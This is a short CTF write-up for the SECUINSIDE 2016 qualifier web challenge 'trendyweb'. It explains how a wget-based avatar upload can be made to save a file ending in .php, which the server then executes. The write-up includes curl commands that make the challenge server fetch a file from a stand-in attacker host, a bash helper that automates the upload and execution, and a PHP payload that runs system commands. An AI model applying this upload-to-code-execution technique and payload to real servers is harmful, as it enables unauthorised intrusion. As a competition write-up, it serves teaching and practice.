SECUINSIDE CTF Quals 2016 web100: trendyweb
This CTF was diffcult, and it seemed to be not well-prepared. I want to see the graph of the number of problems.
Our team could solve only this.
But, considering the solved numbers, we needed to solve also CYKOR_0000*
s and noted
.
solution
Upload your .php
as avatar.png%3fhoge.php
into the /data/$sessId/
directory and execute it on the server.
You can upload files via the system('/usr/bin/wget '.escapeshellarg($origUrl));
.
Make http://your-host.example.com/avatar.png?foo.php
returns something, and call:
$ curl 'http://chal.cykor.kr:8082' -D- -H 'Cookie: PHPSESSID=mde2hg0rm37k28vl8rvatkco31; path=/' -F image='http://your-host.example.com/avatar.png?foo'
This makes the file on http://chal.cykor.kr:8082/data/dd3e534e85eb4ca10180/avatar.png%3ffoo
.
So if you use image='http://your-host.example.com/avatar.png?foo.php
, it becomes http://chal.cykor.kr:8082/data/dd3e534e85eb4ca10180/avatar.png%3ffoo.php
and this is executed on the server when you request it.
This is enough to see the flag. Define a utility function and explore it, you will found the executable which has the flag.
execute_php() {
cat > path/to/avatar.png
key=$RANDOM
curl 'http://chal.cykor.kr:8082' -D- -H 'Cookie: PHPSESSID=mde2hg0rm37k28vl8rvatkco31; path=/' -F image='http://your-host.example.com/avatar.png?'$key'.php'
curl -D- 'http://chal.cykor.kr:8082/data/dd3e534e85eb4ca10180/avatar.png%3f'$key'.php'
}
<?php
system('id', $retval);
system('pwd', $retval);
system('ls -l /', $retval);
system('stat /flag_is_heeeeeeeereeeeeee', $retval);
system('/flag_is_heeeeeeeereeeeeee', $retval); // => flag
?>